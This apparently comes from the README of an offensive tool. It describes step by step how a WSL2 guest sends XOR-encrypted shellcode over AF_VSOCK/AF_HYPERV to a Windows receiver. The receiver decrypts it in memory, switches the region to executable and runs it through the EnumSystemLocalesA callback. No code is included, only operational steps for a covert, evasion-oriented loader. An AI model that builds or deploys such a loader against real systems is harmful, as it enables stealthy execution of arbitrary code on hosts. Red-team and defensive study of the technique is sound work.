Phase 1: Prepare the payload
- On the Linux/WSL2 machine, generate shellcode in raw PIC format.
- Choose a lab-safe behavior (for example, showing a window or performing a benign action).
- Export the buffer to a file named
payload.bin. - Place
payload.binin the same directory asLeymano.
Phase 2: Start the receiver on Windows
On the Windows host, with administrator rights:
cd C:\path\to\Traveler\receiver
.\Anchor.exe
Anchor will:
- Discover the active WSL instance and its GUID.
- Register the communication service under
GuestCommunicationServices. - Open the AF_HYPERV listener for the configured port (5005 by default).
- Wait for an incoming connection from the guest.
Expected output includes messages similar to:
[*] WSL2 Stream Loader
[+] LISTENER ACTIVE. Waiting for injection...
Phase 3: Run the sender on Linux / WSL2
On the Linux/WSL2 VM:
cd sender
./Leymano
Leymano will:
- Load
payload.bininto memory. - Generate a session key and XOR-encrypt the payload.
- Establish an AF_VSOCK socket towards
CID 2and the configured port. - Send key, size, and encrypted stream to Anchor.
Phase 4: Injection and execution
On Windows, Anchor:
- Receives the session key and payload size.
- Reserves RW memory and downloads the encrypted stream into it.
- Applies XOR in-place to recover the clear-text shellcode.
- Switches the region to RX.
- Calls
EnumSystemLocalesA, passing the shellcode pointer as a callback, which triggers execution.